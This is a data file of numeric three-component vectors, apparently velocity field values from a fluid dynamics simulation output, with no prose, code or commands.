(0.141293880535 0.265185012913 0)
(0.151943167294 0.269164579802 0)
(0.161750621345 0.271168648535 0)
(0.170926832313 0.271742383011 0)
(0.179651674077 0.271290785349 0)
(0.188072405679 0.270108902737 0)
(0.196305275043 0.268408357171 -6.74944590799e-29)
(0.204439102253 0.266339525686 0)
(0.212539622686 0.264009313783 6.25524781097e-29)
(0.220653734802 0.261494874355 0)
(0.228813104589 0.258853716559 0)
(0.237036692086 0.256130625932 0)
(0.245331843513 0.253362012213 0)
(0.25369388174 0.250578773368 0)
(0.262104662075 0.247809170855 0)
(0.270531083323 0.245083143623 0)
(0.278924737184 0.242438853075 0)
(0.28722362295 0.239931332413 0)
(0.295356322161 0.237642355173 0)
(0.303248548035 0.235690325113 0)
(0.310831841288 0.234239142916 0)
(0.318054652569 0.233505348886 0)
(0.324896568611 0.233762914221 0)
(0.331389295452 0.235344570542 0)
(0.337642591922 0.23863536468 0)
(0.343898654587 0.244054574789 0)
(0.350551544931 0.251992548397 0)
(0.358388367861 0.262729472793 0)
(0.367586751511 0.276313945601 0)
(0.385754092065 0.290896827452 0)
(-2.2117484439e-05 -0.00244653891557 0)
(-6.57173654862e-05 -0.00243706134797 0)
(-0.000108576718178 -0.00243449764994 0)
(-0.000143314597605 -0.00237225604616 0)
(-0.000174964214308 -0.00235764885917 0)
(-0.000209822763467 -0.00236718124734 0)
(-0.000245330037952 -0.00236580641898 0)
(-0.000283254951216 -0.00239141943267 0)
(-0.000337168405167 -0.00235601408031 0)
(-0.00039211576063 -0.00225644157459 0)
(-0.000433631489976 -0.00226978617321 0)
(-0.000492876531906 -0.00222479147708 0)
(-0.000547245067035 -0.00212590738003 0)
(-0.000587921141191 -0.00218112238683 0)
(-0.000609554563324 -0.00220229273118 7.32598910687e-29)
(-0.000644966268359 -0.00212635169724 0)
(-0.000694655355904 -0.00211745249002 0)
(-0.000722363696248 -0.0021270892661 -6.93224854374e-29)
(-0.000760698912602 -0.00207314412795 0)
(-0.000807779406538 -0.00204399578284 0)
(-0.000849785786322 -0.00204484020061 0)
(-0.000874655844109 -0.0019761520433 0)
(-0.000919969817284 -0.00196538690373 0)
(-0.000957486301806 -0.00193550484619 0)
(-0.000997051392129 -0.00189619638613 0)
(-0.00104239793168 -0.00186932216055 0)
(-0.00108689454814 -0.00183921237568 0)
(-0.00112276799616 -0.00180300668264 0)
(-0.00117329255269 -0.00177728639532 0)
(-0.0012141206626 -0.00173976557627 0)
(-0.00126688381497 -0.0017248554462 0)
(-0.00128677056807 -0.00167765270792 0)
(-0.00131671510863 -0.00163729307781 0)
(-0.0013187033441 -0.00155767551816 0)
(-0.0013589690226 -0.00150213773488 0)
(-0.00139551181096 -0.0014230766989 0)
(-0.0014472330558 -0.00134751068763 0)
(-0.00146427597202 -0.00125207791401 0)
(-0.00143869296121 -0.001156912935 0)
(-0.00137421292361 -0.00116213354052 0)
(-0.00114598119127 -0.00136244277318 0)
(-0.00119539834993 -0.00230337154051 0)
(0.00540440527475 0.0485249168396 0)
(0.0325162992767 0.114660374762 0)
(0.0531829044138 0.164373259165 0)
(0.0720522717339 0.201477838141 0)
(0.0893437687009 0.228731581396 0)
(0.104815389049 0.248187331928 0)
(0.118560943009 0.261617230166 0)
(0.130805322864 0.270498215217 0)
(0.1418044138 0.276011592022 0)
(0.151815937091 0.279076545868 0)
(0.161078120143 0.280389460804 0)
(0.16979641268 0.280464290615 0)
(0.178139027675 0.279671445999 0)
(0.186237945279 0.278272470157 0)
(0.194192738084 0.276449089514 0)
(0.202075576464 0.274326410174 0)
(0.209936291031 0.271990681297 -6.18584523148e-29)
(0.217806787942 0.269502375215 0)
(0.225704387781 0.266905211249 0)
(0.233633651437 0.26423159694 0)
(0.241586295225 0.261505296257 0)
(0.249539247162 0.258742907021 0)
(0.257451689585 0.25595626123 0)
(0.265262572461 0.253157545755 0)
(0.272890109762 0.250367809884 0)
(0.280234140959 0.247628186134 0)
(0.287181345371 0.245012312055 0)
(0.293612646535 0.242638435129 0)
(0.299412104139 0.240680437575 0)
(0.304477472044 0.239378103167 0)
(0.308733751406 0.239047895865 0)
(0.312156058749 0.240096008804 0)
(0.314802117367 0.24303301192 0)
(0.316900710289 0.24848816845 0)
(0.318890524934 0.257174446175 0)
(0.32173194801 0.269860010339 0)
(0.326575600751 0.286840551724 0)
(0.339320720396 0.306328660568 0)
(-2.1465882875e-05 -0.0024900854507 0)
(-6.90952801812e-05 -0.00248224808462 0)
(-0.000105928314716 -0.00244937573444 0)
(-0.000126910489086 -0.00238874714816 0)
(-0.000158353208388 -0.0023821004907 0)
(-0.000198278247425 -0.00240216920616 0)
(-0.00023688644067 -0.00240600933148 0)
(-0.000275076208541 -0.00243019994395 0)
(-0.000322445837863 -0.00241938795251 0)
(-0.000379890175519 -0.00232328162268 0)
(-0.000422808111183 -0.00229012087559 0)
(-0.000477789214328 -0.00233155318196 0)
(-0.000527904415953 -0.00219124586826 0)
(-0.000575422566159 -0.0021908260046 0)
(-0.000588925217098 -0.00223150006143 0)
(-0.000632461052151 -0.00220905394211 0)
(-0.000667333852286 -0.00213842565699 0)
(-0.000699346560287 -0.00215829887168 6.80768704568e-29)
(-0.000743360124229 -0.00215780114626 0)
(-0.000769367895374 -0.002076967122 0)
(-0.000808402574383 -0.00207389637548 0)
(-0.000840639792474 -0.00202343913299 0)
(-0.000875905347535 -0.00198840583253 0)
(-0.000927370279431 -0.00200334317787 0)
(-0.000944981420548 -0.00193520872301 0)
(-0.00100417960082 -0.00193303616659 0)
(-0.00102115798657 -0.00186386171539 0)
(-0.00107039727651 -0.00184981571933 0)
(-0.0011154164177 -0.00182753700421 0)
(-0.00115096510378 -0.00178146824672 0)
(-0.00119496506698 -0.00174973651949 0)
(-0.00123564123992 -0.00171771278015 0)
(-0.00127782532983 -0.00168596684879 0)
(-0.00130992530386 -0.00163372409092 0)
(-0.00134702061762 -0.0015733607014 0)
(-0.00139109593482 -0.00150118086818 0)
(-0.0014292616798 -0.00140174717337 0)
(-0.00144416904601 -0.0012718945743 0)
(-0.0014196129628 -0.00113455342204 0)
(-0.00130055768304 -0.00102815105419 0)
(-0.000679743382278 -0.00096834524841 0)
(-0.00117191156192 -0.00179167200429 0)
(0.0123749930143 0.0716769476132 0)
(0.0366120473213 0.135700033878 0)
(0.0572843281005 0.184018955259 0)
(0.0756886964215 0.219363162505 0)
(0.0921959175465 0.244718583446 0)
(0.106835660344 0.262371564756 0)
(0.119768635646 0.274204174426 0)
(0.131259294189 0.281744346978 0)
(0.141591004105 0.286185262465 0)
(0.151031827294 0.288429850427 0)
(0.159817530959 0.289142263026 7.03528428923e-29)
(0.168142910502 0.288797785321 -6.91236375318e-29)
(0.176160790648 0.287728027498 0)
(0.183985776632 0.286159307518 0)
(0.191699999629 0.284243389099 0)
(0.199359186669 0.282080938508 0)
(0.206998079592 0.279738658516 0)
(0.21463470022 0.277261255614 -5.71524744495e-29)
(0.222273155805 0.274678949656 0)
(0.229904476504 0.272010960721 0)
(0.237505005051 0.269266066834 0)
(0.245032607862 0.266442572932 0)
(0.252422135336 0.263530631232 0)
(0.259582253777 0.260519006112 0)
(0.266395425459 0.25740645898 0)
(0.272721591549 0.254216072407 0)
(0.278404752436 0.251010053275 0)
(0.28328080833 0.247903093685 0)
(0.287185051613 0.245073946692 0)
(0.289958748557 0.242776864364 0)
(0.291455419566 0.241356794764 0)
(0.291553754853 0.241275121782 0)
(0.290178342795 0.24315552377 0)
(0.287405695517 0.247866784445 0)
(0.283500659691 0.256632637709 0)
(0.279664988244 0.271253780352 0)
(0.277955575553 0.293265930136 0)
(0.280717205061 0.323274926184 0)
(-1.72969882135e-05 -0.00252945991407 0)
(-5.49771091682e-05 -0.00252633613573 0)
(-8.67380848688e-05 -0.0024557726535 0)
(-0.000119081084766 -0.00239278600304 0)
(-0.000162172682966 -0.00242252511153 0)
(-0.00019947856603 -0.0024391866716 0)
(-0.000234950793336 -0.00244432530236 0)
(-0.000267611430134 -0.00246261841634 0)
(-0.000304231427284 -0.00246432146695 0)
(-0.000359817206071 -0.00238347007779 0)
(-0.000415702744935 -0.00232217500595 0)
(-0.000449053735707 -0.00233603802365 0)
(-0.000504047362731 -0.00228196354702 0)
(-0.000552299620914 -0.00218504346643 0)
(-0.000582310610476 -0.00224611838356 0)
(-0.000607963833706 -0.00226312741143 0)
(-0.000637193923032 -0.00216691882855 0)
(-0.000679412846068 -0.0021739738411 0)
(-0.000704371620465 -0.00217963555241 0)
(-0.000731016384088 -0.00211023723722 0)
(-0.000770951474421 -0.00209501297462 0)
(-0.000811517607504 -0.00208921055773 0)
(-0.000832887577567 -0.00201644288903 0)
(-0.000871129682953 -0.00201532554325 0)
(-0.000897597771311 -0.00197155681932 0)
(-0.000941103435219 -0.00194479224105 0)
(-0.000976828477979 -0.00191342193472 5.27284439882e-29)
(-0.00102391862465 -0.00189732848012 -5.13389129545e-29)
(-0.00105816561687 -0.00186111026308 0)
(-0.00110816253415 -0.00183570912291 0)
(-0.00115694804574 -0.00180451044002 0)
(-0.00120857090365 -0.00177267043561 0)
(-0.0012637679191 -0.00173823927945 0)
(-0.00131767652644 -0.00168928102471 0)
(-0.00137984763105 -0.00163620667368 0)
(-0.00145154567201 -0.00156936515157 0)
(-0.00153917729769 -0.00148224526198 0)
(-0.00164767424374 -0.00136994234333 0)
(-0.00178230115629 -0.00122761661841 0)
(-0.0019353236931 -0.00102661274093 0)
(-0.0013540384705 -0.000897538655192 0)
(-0.0046630028282 -0.000407533167649 0)
(0.0221175418222 0.0932569465202 0)
(0.0412479881043 0.156342659566 0)
(0.0609184930053 0.202937505184 0)
(0.0786106287805 0.236423037416 0)
(0.0942689985058 0.259857625738 0)
(0.108065063281 0.275726090826 0)
(0.120215073143 0.286020594532 0)
(0.131007894906 0.292306538365 0)
(0.140740769206 0.295773213016 0)
(0.149683024838 0.297294751028 0)
(0.158061484483 0.297494159553 0)
(0.166055851145 0.296802653187 0)
(0.173801061109 0.295510648452 0)
(0.181393453372 0.293809003408 0)
(0.188897990657 0.291820539758 0)
(0.196354964018 0.289623001806 0)
(0.203785400905 0.287264994151 0)
(0.211194900142 0.284776432787 5.66864195327e-29)
(0.218575680988 0.282174125382 5.3842985903e-29)
(0.22590614958 0.279462773202 0)
(0.233147392988 0.276632978756 0)
(0.240237277144 0.273659769761 0)
(0.247084454844 0.270505621973 0)
(0.253565179331 0.267130116801 0)
(0.259524790829 0.263505308552 0)
(0.264783708168 0.259633503714 0)
(0.269145936277 0.255563713875 0)
(0.272407203521 0.251404390022 0)
(0.274359989368 0.247332475737 0)
(0.274793553547 0.243601313063 0)
(0.273486953723 0.240552751119 0)
(0.270197362843 0.238642986543 0)
(0.264631970567 0.238498954769 0)
(0.256472609768 0.241043078635 0)
(0.245225547367 0.247748973956 0)
(0.231509891756 0.261228233893 0)
(0.216258395959 0.285756844645 0)
(0.203313794897 0.332611379011 0)
(-1.40321111541e-05 -0.00256202467727 0)
(-4.20729539785e-05 -0.0025607332144 0)
(-6.50848981059e-05 -0.00250599210234 0)
(-0.000116423043977 -0.00245787451517 0)
(-0.000174590253455 -0.00245885220657 0)
(-0.000204237434072 -0.0024717391784 0)
(-0.000233279126924 -0.00247780470038 0)
(-0.000258807035668 -0.00248547727945 0)
(-0.000287894383928 -0.00250200902882 0)
(-0.000340460509496 -0.00245992821201 0)
(-0.000402625392572 -0.0023803986282 0)
(-0.000438959744152 -0.00235189392247 0)
(-0.000485736222981 -0.00238668473955 0)
(-0.000530059158662 -0.00224934129666 0)
(-0.000571867866566 -0.00224290835986 0)
(-0.000583913348546 -0.00228218599321 0)
(-0.00061789523706 -0.00224826612502 0)
(-0.000650594179967 -0.00218927186832 0)
(-0.000673491176644 -0.00220202759199 0)
(-0.000706689997862 -0.00218398213579 0)
(-0.000731971390041 -0.00211400628327 5.99527565472e-29)
(-0.000766040751298 -0.00211261340649 0)
(-0.000789625024147 -0.00205374831004 0)
(-0.000823118099563 -0.002027161451 0)
(-0.000870834776153 -0.00204582622392 0)
(-0.000892002753428 -0.00198259385004 0)
(-0.000935554094689 -0.00195896627256 0)
(-0.000968607428535 -0.00192543401796 0)
(-0.00101492905424 -0.00191268146962 0)
(-0.00106628011266 -0.00189465350997 0)
(-0.00111028150071 -0.00185092064485 0)
(-0.00117365764099 -0.0018287329258 0)
(-0.00123757297454 -0.00179750657506 0)
(-0.00130756487095 -0.00175897501251 0)
(-0.00139834892982 -0.00172634364083 0)
(-0.00149166562548 -0.00166881644113 0)
(-0.0016165961719 -0.00160912460797 0)
(-0.00177369352007 -0.00152809163147 0)
(-0.00193361175218 -0.00138537584058 0)
(-0.00207249464024 -0.00129686177097 0)
(-0.00205081702812 -0.00187803700396 0)
(0.00012948457912 0.0229486801374 0)
(0.0267064516343 0.112488298597 0)
(0.0452326974811 0.175902896229 0)
(0.0638842732329 0.220988801092 0)
(0.0807089785084 0.25260605365 0)
(0.0955306404419 0.274145597648 0)
(0.108530854508 0.288286818346 0)
(0.119960910147 0.297125809252 0)
(0.13012984699 0.302256014145 0)
(0.139341218461 0.304850223627 0)
(0.147859130366 0.305743127834 0)
(0.155896954767 0.305509598456 0)
(0.163616630296 0.304533297035 0)
(0.171134199401 0.303062703532 0)
(0.178528043781 0.301254224516 0)
(0.185847119947 0.29920356407 0)
(0.193117882362 0.296967475214 0)
(0.200349360209 0.294578020809 0)
(0.207536349619 0.29205118843 -5.39908375327e-29)
(0.214660535259 0.289390109294 -5.34935816264e-29)
(0.221688486337 0.286582947184 0)
(0.228565843511 0.283597935957 0)
(0.235209109103 0.280380842592 0)
(0.241498612973 0.276860031836 0)
(0.247276389748 0.272960761155 0)
(0.252350581857 0.268625787057 0)
(0.25650497972 0.263836702 0)
(0.259510233259 0.258630831286 0)
(0.26113264625 0.253110988604 0)
(0.261137069648 0.247448575672 0)
(0.259281205467 0.241882722529 0)
(0.255297113964 0.236720057732 0)
(0.248857757912 0.232341659313 0)
(0.239499160143 0.229227073376 0)
(0.226531781706 0.228019786485 0)
(0.208552882465 0.229663370665 0)
(0.183712455003 0.235794642086 0)
(0.142066252002 0.249875426534 0)
(0.0865412393511 0.283504561539 0)
(-1.54982110632e-05 -0.00258884273801 0)
(-4.87615642918e-05 -0.00258874690514 0)
(-7.27962277066e-05 -0.00253342698569 0)
(-0.000114121380817 -0.00258625051361 0)
(-0.000163464103542 -0.0025081642936 0)
(-0.00019977806848 -0.00250006068054 0)
(-0.000227436604012 -0.00250662880297 0)
(-0.00025116973107 -0.00250704957136 0)
(-0.000277408720994 -0.00253767486446 0)
(-0.000317240199529 -0.00252122369074 0)
(-0.000376102395296 -0.00244109427744 0)
(-0.000430375825024 -0.00237821874638 0)
(-0.000458937236263 -0.00237950972127 0)
(-0.000500749875452 -0.002345234528 0)
(-0.00054364499881 -0.00224567873422 0)
(-0.000571419946201 -0.00228411207304 0)
(-0.000584798269405 -0.00229348094668 0)
(-0.000612952796388 -0.00220388561291 0)
(-0.000646538329445 -0.00219791862391 0)
(-0.000667188554443 -0.00221286890937 0)
(-0.000689826750622 -0.00213266573868 -5.93667729189e-29)
(-0.000726315140584 -0.00211773297506 0)
(-0.000761783043867 -0.00211810552243 0)
(-0.00078792321154 -0.0020650508762 0)
(-0.000817844075008 -0.00205142626408 0)
(-0.000845353658558 -0.00202145118874 0)
(-0.000879852157295 -0.0019859804419 0)
(-0.000922054682925 -0.00197268146466 0)
(-0.000960573553844 -0.0019512838867 0)
(-0.00100511027642 -0.00193064322675 0)
(-0.00106218656209 -0.00191085590649 0)
(-0.00112766232165 -0.00189680848189 0)
(-0.00119122999725 -0.00186984159567 0)
(-0.001268768733 -0.00184377021049 0)
(-0.00136148887911 -0.00181739297845 0)
(-0.00147418271293 -0.00179094927332 0)
(-0.00159404450504 -0.00174092473647 0)
(-0.00175493344787 -0.00168093792696 0)
(-0.00186644026181 -0.00156063703242 0)
(-0.00201651020665 -0.00170793243534 0)
(-0.00221904958043 -0.00276361446479 0)
(0.000567747455097 0.0432909334489 0)
(0.0291564041552 0.13274171111 0)
(0.0475725239301 0.194978273554 0)
(0.065760465842 0.238365865918 0)
(0.0818911251539 0.268030167296 0)
(0.0959825503252 0.287669790214 0)
(0.108281802798 0.300136128929 0)
(0.119080921473 0.30760344844 0)
(0.128711529664 0.311675509462 0)
(0.137481597662 0.313494256605 0)
(0.145646757922 0.313844580338 0)
(0.153404531875 0.313247408448 0)
(0.160898110718 0.312036834512 0)
(0.168224969996 0.310419941152 0)
(0.175446807156 0.308520578879 0)
(0.182598354218 0.306409631338 0)
(0.189694162352 0.304124930393 -5.57002996941e-29)
(0.196733098605 0.301683460161 0)
(0.203700759019 0.299087891743 5.36499847563e-29)
(0.210569531709 0.296326933918 0)
(0.21729466446 0.293369330626 0)
(0.223805668527 0.290155590497 0)
(0.22999572619 0.286595283827 0)
(0.235714391806 0.282576221999 0)
(0.240768059319 0.277985643907 0)
(0.244928970187 0.272737322213 0)
(0.247949560609 0.266796170427 0)
(0.249577071927 0.260193992142 0)
(0.249563493677 0.253033982241 0)
(0.247667518729 0.2454854524 0)
(0.24364640819 0.237771478782 0)
(0.237233815071 0.230152591323 0)
(0.228103521623 0.222907426439 0)
(0.215786502445 0.216307047327 0)
(0.199598415701 0.210575916269 0)
(0.178184756535 0.205757287581 0)
(0.149883389971 0.201520835015 0)
(0.107586377188 0.19553412249 0)
(0.0603435454542 0.177683629581 0)
(-1.76575137634e-05 -0.00261986942802 0)
(-5.63363904768e-05 -0.00262145084338 0)
(-9.58876176016e-05 -0.00253877382564 0)
(-0.000116806976173 -0.00257950551813 0)
(-0.000145147909159 -0.00254704331801 0)
(-0.000192805676869 -0.00253100439545 0)
(-0.000221122435766 -0.00253406768567 0)
(-0.000246125125095 -0.00253643782782 0)
(-0.000266920142171 -0.00256295889136 0)
(-0.000290959750295 -0.00256362622663 0)
(-0.000341806954825 -0.00251584964895 0)
(-0.000403288798114 -0.00243786600475 0)
(-0.000440536997701 -0.00238123843456 0)
(-0.00046950083095 -0.0023849921124 0)
(-0.000517232002577 -0.00232408195646 0)
(-0.000552487786357 -0.00226260810368 0)
(-0.000564475975099 -0.00230271918232 0)
(-0.000597675325386 -0.00231382283494 0)
(-0.000615566220254 -0.0022052235873 0)
(-0.000639244862147 -0.00222749569482 0)
(-0.000672140114514 -0.002225366207 0)
(-0.000692051188561 -0.00214092687233 0)
(-0.000724199385347 -0.00214063303339 0)
(-0.000743427506333 -0.00209766776102 0)
(-0.000770745180295 -0.00207493138786 0)
(-0.000802347647591 -0.00206767180511 0)
(-0.000830117468219 -0.00202963435303 0)
(-0.000867855484563 -0.00201403492869 0)
(-0.000898408483756 -0.00198902545882 0)
(-0.000952126765885 -0.00199107030411 0)
(-0.00100378742323 -0.00197617308049 0)
(-0.00105181157859 -0.00194979202373 0)
(-0.00111139663179 -0.00193220547853 0)
(-0.00119083375072 -0.0019260150628 0)
(-0.00128297834838 -0.00191624537954 0)
(-0.00138448536583 -0.00189364361717 0)
(-0.0015044557896 -0.00187276788274 0)
(-0.00168480685855 -0.00185622166417 0)
(-0.00173114623151 -0.00172229604206 0)
(-0.0018378480528 -0.0020120096786 0)
(-0.00228321403763 -0.00340790006792 0)
(0.00112399593332 0.0647565887118 0)
(0.0303953899962 0.153148997012 0)
(0.0486970761111 0.213786477733 0)
(0.0666415174271 0.25523568566 0)
(0.0822431082824 0.282829407275 0)
(0.0957174525558 0.30054073283 0)
(0.107413522014 0.311371521153 0)
(0.117672607904 0.317544056613 0)
(0.126848749011 0.320648520191 0)
(0.135252413194 0.321779480321 0)
(0.143128603142 0.321661892858 0)
(0.150657792147 0.320758048431 0)
(0.15796456729 0.319351708911 0)
(0.165129063181 0.317610073255 0)
(0.172198159611 0.315626890001 0)
(0.179194445846 0.31345069962 5.57514778826e-29)
(0.186122579429 0.311102400674 5.53215252474e-29)
(0.192973025306 0.308585120493 0)
(0.19972362207 0.305888482641 0)
(0.206338468632 0.302985422684 0)
(0.212761589285 0.299821311759 0)
(0.218904998182 0.296302240829 0)
(0.224635844875 0.292293805264 0)
(0.22977008853 0.287637354036 0)
(0.234077502463 0.282180716499 0)
(0.23729705134 0.275812773107 0)
(0.239156991751 0.268490390718 0)
(0.23939306806 0.260250990012 0)
(0.237759566338 0.251209775921 0)
(0.234031109776 0.241545090187 0)
(0.227994721049 0.231475092077 0)
(0.219430231675 0.221228879077 0)
(0.208085947676 0.211008750348 0)
(0.193616898429 0.200932200923 0)
(0.175580883806 0.190931245097 0)
(0.153026504723 0.180453360553 0)
(0.125233731001 0.168136473876 0)
(0.0879044527843 0.147807287432 0)
(0.047864158275 0.109464412458 0)
(-1.72029004273e-05 -0.00266156931814 0)
(-5.12001908227e-05 -0.00266584552399 0)
(-0.000105687446363 -0.00259079540857 0)
(-0.000134619816573 -0.00256105516556 0)
(-0.000152138935148 -0.00261590395208 0)
(-0.000187678700873 -0.002565508372 0)
(-0.000214466111866 -0.00256070846878 0)
(-0.000238125532462 -0.00256210921505 0)
(-0.000254276435778 -0.0025710136809 0)
(-0.000271471716666 -0.00259419849702 0)
(-0.000305882770309 -0.00257746979656 0)
(-0.000361332823785 -0.00249716407629 0)
(-0.000420178340194 -0.00242901817132 0)
(-0.000447902011549 -0.002386760738 0)
(-0.000484579137778 -0.00240682538277 0)
(-0.000521667863569 -0.00229255788218 0)
(-0.000553295008008 -0.00227412935541 0)
(-0.000566870730083 -0.00231862477904 0)
(-0.000581458372217 -0.00224004861377 0)
(-0.000613483641958 -0.00222409387264 0)
(-0.000634305304166 -0.00223887193053 0)
(-0.000647993355277 -0.00216885813737 0)
(-0.000677570741539 -0.00214936456358 0)
(-0.000698664311885 -0.0021283480556 0)
(-0.000722378724592 -0.00210197475312 0)
(-0.000743541346151 -0.00207573343563 0)
(-0.000774791485414 -0.00206711321509 0)
(-0.000797959979813 -0.00203084736043 0)
(-0.000840272929689 -0.0020377377187 0)
(-0.000884323713603 -0.00204530794709 0)
(-0.000910644542318 -0.00200673113578 0)
(-0.000957115407068 -0.00199891015194 0)
(-0.00101331475032 -0.00199969785205 0)
(-0.00108716430056 -0.0020134575972 0)
(-0.00116194036409 -0.00200831318094 0)
(-0.00125969671482 -0.00201579615779 0)
(-0.00137297212591 -0.00201607682299 0)
(-0.00155567471774 -0.0020275143792 0)
(-0.00159892346607 -0.00192860056962 0)
(-0.0017901142608 -0.00250301671972 0)
(-0.00274064254833 -0.00487756738264 0)
(0.00227159831229 0.0860721644589 0)
(0.031094519197 0.173707390385 0)
(0.0491497604782 0.232415140353 0)
(0.0668104014888 0.271685528393 0)
(0.081948190452 0.297091966218 0)
(0.0948810314086 0.31284778672 0)
(0.106051049504 0.32207994767 0)
(0.115847470191 0.3270299335 0)
(0.124641515217 0.32924978299 0)
(0.132742178679 0.329770253069 0)
(0.14038158756 0.329247421643 0)
(0.147722528808 0.328081717107 0)
(0.154871759856 0.326507019781 0)
(0.161893766754 0.324652908779 -5.73439478949e-29)
(0.168822707262 0.322585781762 0)
(0.175671118858 0.320334272103 -5.53764022122e-29)
(0.182435638561 0.317904100451 0)
(0.189099864369 0.315285430295 0)
(0.195635060928 0.312454709591 0)
(0.201997728994 0.309367010729 0)
(0.208120208363 0.30593905349 0)
(0.213894773051 0.302034306677 0)
(0.219158948879 0.297465976202 0)
(0.223691958142 0.29202423686 0)
(0.227226551118 0.285519262726 0)
(0.22947234437 0.277823489886 0)
(0.230142004611 0.268898954427 0)
(0.228972421823 0.258804049297 0)
(0.225735922825 0.247681554876 0)
(0.22024149564 0.235734454159 0)
(0.212327114155 0.223193654309 0)
(0.201843760019 0.210283485386 0)
(0.188649087648 0.197178842741 0)
(0.172572133103 0.183946976379 0)
(0.153494980433 0.170463856444 0)
(0.130997030571 0.156010674891 0)
(0.105755540794 0.138833528121 0)
(0.0742241528856 0.108089643824 0)
(0.0375044775467 0.0581412623988 0)
(-1.69043740577e-05 -0.00270385976057 0)
(-5.05165687212e-05 -0.0027111773569 0)
(-0.000107994357513 -0.00270155149097 0)
(-0.000154110078261 -0.0025901193998 0)
(-0.000166281463791 -0.00266494511448 0)
(-0.000173662401971 -0.00260895002539 0)
(-0.000200590252302 -0.00258664174392 0)
(-0.000223399514669 -0.00258586364367 0)
(-0.000242513886489 -0.00258269180476 0)
(-0.000259354342709 -0.00261495639717 0)
(-0.000279195164781 -0.00260639085678 0)
(-0.000324323852927 -0.00258813098627 0)
(-0.000379941591154 -0.00248774834871 0)
(-0.000429709874434 -0.00241219451472 0)
(-0.00045587005321 -0.002408363583 0)
(-0.000495725885764 -0.00240612029445 0)
(-0.000529671617199 -0.00229888161512 0)
(-0.000546305022798 -0.00230176869609 0)
(-0.00055909842106 -0.00230836158099 0)
(-0.000578965957617 -0.00223840081474 0)
(-0.000599052164988 -0.00223155942917 0)
(-0.000613805047024 -0.0022156560891 0)
(-0.000631175045176 -0.00216632298565 0)
(-0.000652345150503 -0.00214407874722 0)
(-0.000669244471034 -0.00212269049364 0)
(-0.000690964723579 -0.00210560803607 0)
(-0.000711189945935 -0.00208307933629 0)
(-0.000739601081237 -0.00207436561156 0)
(-0.00077048405637 -0.00207626470569 0)
(-0.000787848166308 -0.00206104478685 4.40328020058e-29)
(-0.000814005273799 -0.00205652750509 -4.20642212454e-29)
(-0.000848736309353 -0.00206016453772 0)
(-0.000888203367373 -0.00206672554716 0)
(-0.000934809771138 -0.0020756451187 0)
(-0.000989516969184 -0.00208338723584 0)
(-0.00106069288265 -0.00209529950705 0)
(-0.00116045112182 -0.00213806029729 0)
(-0.00127698613741 -0.00216824035534 0)
(-0.00131366205064 -0.00212667652481 0)
(-0.0016764458476 -0.00293910373292 0)
(-0.00157890647122 -0.00360686204061 0)
(0.00287937315112 0.106537908411 0)
(0.0314166264431 0.194211790783 0)
(0.0492201895941 0.250837982516 0)
(0.0664995308442 0.287740276912 0)
(0.0811927729014 0.31086674469 0)
(0.0936302589672 0.324653783765 0)
(0.104327876997 0.332329236545 0)
(0.113719696538 0.336127566699 0)
(0.122187473307 0.337539615937 0)
(0.130033594472 0.337517389703 -6.25120622175e-29)
(0.137474874814 0.336641019834 6.16456374241e-29)
(0.144656047185 0.335247553814 0)
(0.151667094358 0.333522599233 5.73237616742e-29)
(0.158558660379 0.331560940545 5.69283939673e-29)
(0.165354209626 0.329404477225 0)
(0.172058105614 0.32706418617 0)
(0.178660554555 0.324532053884 0)
(0.185139503827 0.321785807972 0)
(0.191460513329 0.318788168541 0)
(0.197572801996 0.315473348419 0)
(0.203395865888 0.31172249761 0)
(0.208798944318 0.307346594697 0)
(0.213585424758 0.302097759257 0)
(0.21749450134 0.295712286833 0)
(0.220222329 0.287968398166 0)
(0.221454475337 0.278735172472 0)
(0.220897707156 0.267997117251 0)
(0.218302722962 0.255851850792 0)
(0.213473800314 0.242486989825 0)
(0.206268241352 0.228146427666 0)
(0.196586539649 0.213090460362 0)
(0.184356265949 0.197560381149 0)
(0.169537422085 0.181732788402 0)
(0.152070977973 0.165687187034 0)
(0.132027990626 0.149428847021 0)
(0.10945887913 0.132326038591 0)
(0.0864165216772 0.113037904557 0)
(0.0553564132739 0.0739448011804 0)
(0.00131150701624 0.00190967338012 0)
(-1.56057022231e-05 -0.00273357440963 0)
(-5.20835292451e-05 -0.00274587467019 0)
(-9.36265538789e-05 -0.00274684186897 0)
(-0.000143304731912 -0.00261682828008 0)
(-0.000171311609852 -0.00258944270981 -9.31646369079e-30)
(-0.000178852358013 -0.00262303271421 -4.87751050349e-33)
(-0.000193654290107 -0.0026103575151 9.57236140162e-30)
(-0.000208933951997 -0.00261053153475 0)
(-0.000231546002984 -0.00260924726897 0)
(-0.000247685036879 -0.00262264835559 0)
(-0.000264029395089 -0.00263493527887 0)
(-0.000288426000059 -0.00260728461706 0)
(-0.000334033361235 -0.00255467423763 0)
(-0.000395583987879 -0.00247069619298 0)
(-0.00043812840724 -0.00240691141732 0)
(-0.000467786876456 -0.00242144437363 0)
(-0.000497133656752 -0.0023619913639 0)
(-0.000523487374348 -0.00230073078881 0)
(-0.000532051937456 -0.00229784236944 0)
(-0.000547487306338 -0.00230372734229 0)
(-0.000559703030014 -0.00223156939599 0)
(-0.00057671422178 -0.00221126904605 0)
(-0.000591850806588 -0.00220244180421 0)
(-0.000602728124674 -0.00215826193517 0)
(-0.000620108310579 -0.00213909745563 0)
(-0.000636321507454 -0.00212950847801 0)
(-0.000650161646065 -0.00211259536788 0)
(-0.000666982958246 -0.00210715426343 0)
(-0.000671006783512 -0.00208207178191 0)
(-0.000679087263818 -0.0020812920055 0)
(-0.000686657473383 -0.00206808022312 0)
(-0.000699713944432 -0.00205954596302 0)
(-0.000722408607821 -0.0020788522824 0)
(-0.00074525837434 -0.00209748481743 0)
(-0.000775382009794 -0.00211729100885 0)
(-0.000824341105143 -0.0021603614399 0)
(-0.000860650180446 -0.00217949425977 0)
(-0.000862459181715 -0.00214817463539 0)
(-0.00102246470832 -0.00238429150454 0)
(-0.00115958729283 -0.00274848611245 0)
(-0.00117131802854 -0.00312253400863 0)
(0.00233305775555 0.126966171575 0)
(0.0313184492883 0.214754559354 0)
(0.0491332274085 0.269090871322 0)
(0.0659390398348 0.303414302872 0)
(0.0801656418568 0.324173525229 0)
(0.0921222857303 0.335992861357 0)
(0.102374915262 0.342163150864 0)
(0.111397760226 0.344883205307 0)
(0.119576185313 0.34556081882 0)
(0.127200059253 0.345056428141 0)
(0.134468092306 0.343869453458 0)
(0.141506594297 0.342273883029 0)
(0.148389827709 0.340409751612 -5.69027963088e-29)
(0.155156254305 0.338340291382 0)
(0.161820404891 0.336085733458 0)
(0.168379996203 0.333641391242 0)
(0.174820035242 0.330986629448 0)
(0.181113674998 0.328086903705 0)
